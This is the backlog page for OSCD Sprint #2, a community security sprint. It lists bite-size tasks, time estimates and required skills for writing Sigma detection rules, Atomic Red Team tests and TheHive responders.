Home

EN | RU

OSCD

OSCD Sprint #2: Backlog


This time we decided to detail the backlog to bite-size tasks with Estimated Time to Complete (ETC). For most of the tasks ETC is around 20-30 minutes. You can find these tasks in the GitHub issues listed in the tables below.

Also, we listed the knowledge required to solve these tasks. You can find details on that and other important topics in the OSCD How-To.

It worth mentioning that the backlog does not limit contributions. You are welcome to contribute your private analytics (Atomic Tests, Sigma Rules, TheHive Responders) that are outside of the defined scope.


Threat Detection

One of the most critical issues of the Sigma Project ruleset is the lack of ability to detect indicators of CMD/PowerShell commands obfuscation. This is our main focus for the Threat Detection part of the sprint.

Also, there are a few tasks to develop Sigma rules for published Threat Detection researches and Threat Simulation tools.

GitHub Issue (list of tasks inside) Required Knowledge
ETC per task
Windows: Invoke-Obfuscation Regexes, Sigma Rules < 30 min
Windows: Invoke-DOSfuscation Regexes, Sigma Rules ~ 1 hour
Windows: LOLBAS Sigma Rules < 30 min
Windows: Lateral Movement Splunk queries, Sigma Rules < 30 min
Windows: PowerShell Abuse Kibana queries, Sigma Rules < 30 min
Windows: Privilege Escalation Kibana queries, Sigma Rules < 30 min
Windows: ART cross-coverage Atomic Red Team Tests, Sigma Rules ~ 1 hour[*]
macOS: ART cross-coverage Atomic Red Team Tests, Sigma Rules ~ 1 hour
Linux: ART cross-coverage Atomic Red Team Tests, Sigma Rules ~ 1 hour[*]


Adversary Simulation

We analyzed the actual coverage of Sigma rules by Atomic Red Team tests and developed a list of tests that are absent, and at the same time could be developed during the sprint.

GitHub Issue (list of tasks inside) Required Knowledge
ETC per task
Atomic Red Team tests for Windows Atomic Red Team Tests, Sigma Rules ~ 1 hour[*]
Atomic Red Team test for Linux Atomic Red Team Tests, Sigma Rules ~ 30 min


Incident Response

The listed GitHub issues are independent tasks that include the development of one TheHive Responder with multiple Response Actions. These tasks are the most complex ones, that take a lot of time to complete (up to 16 hours if knowledge requirements met). It is recommended to work on them in groups of two-three specialists. Companions could be found in the comments to a specific GitHub Issue.

GitHub Issue Required Knowledge
ETC per task
Palo Alto NGFW Python, TheHive Responders ~ 16 hours
Carbon Black Predictive Security Cloud Python, TheHive Responders ~ 8 hours
Duo Security Python, TheHive Responders ~ 4 hours
Azure Active Directory Python, TheHive Responders ~ 4 hours
Google Gmail Python, TheHive Responders ~ 8 hours


[*] ETC for most of the tasks. Those tasks that could take more time commented separately in the GitHub issue.


EN | RU

Home